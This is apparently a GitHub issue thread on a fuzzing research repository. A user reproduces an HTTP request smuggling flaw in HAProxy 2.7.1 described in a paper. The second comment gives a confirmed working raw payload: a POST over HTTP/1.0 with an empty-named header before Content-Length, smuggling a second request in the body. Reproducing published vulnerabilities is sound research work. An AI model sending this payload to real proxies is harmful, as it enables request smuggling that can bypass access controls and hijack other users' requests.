### ISSUE TITLE
Cannot reproduce HAProxy request smuggling attack

### ISSUE THREAD

**Issue by kenballus** [bahruzjabiyev/gudifu-fuzzer#4]
Hey Bahruz :)

I'm looking at fig. 2 in the paper, and it seems like that HAProxy bug is really bad, so I wanted to reproduce it.

In the paper, you write the following:
> As shown in the first row of Table 4, when HAProxy
receives a request with an empty header name, it removes the
header coming after this header. As a result, if the input request
has a request body and has a Content-Length header after the
empty-named header, HAProxy forwards this request without the
Content-Length header while leaving the request body intact. We
see that when we put another request in the body of this request,
it is forwarded by HAProxy and treated as the next request by the
origin server.

I'm not able to reproduce this behavior. I've built HAProxy 2.7.1 (straight from the download link your Dockerfile) with a nearly identical configuration to the one provided in this repository, and sent it the following payload:
```
GET / HTTP/1.1\r\n
Host: a\r\n
:\r\n
Content-Length: 27\r\n
\r\n
GET / HTTP/1.1\r\n
Host: a\r\n
\r\n
```

When I do this, HAProxy forwards the following to the backend server:
```
GET / HTTP/1.1\r\n
host: a\r\n
transfer-encoding: chunked\r\n
\r\n
1B\r\n
GET / HTTP/1.1\r\n
Host: a\r\n
\r\n
\r\n
0\r\n
\r\n
```

In other words, I'm not seeing the exploitable behavior you describe in the paper. Instead of the `Content-Length` header being deleted, it's just replaced with `Transfer-Encoding: chunked`, and the request body is correspondingly transformed. Any ideas what's going wrong?

-Ben

**Comment by kenballus** [comment]
Update: with some guidance from Bahruz, I can now reproduce the issue. There were a couple of details missing from the paper, namely that not all methods work, and that the version must be `HTTP/1.0`. Here's an updated payload that works:
```
POST / HTTP/1.0\r\n
Host: a\r\n
:\r\n
Content-Length: 27\r\n
\r\n
GET / HTTP/1.1\r\n
Host: a\r\n
\r\n
```
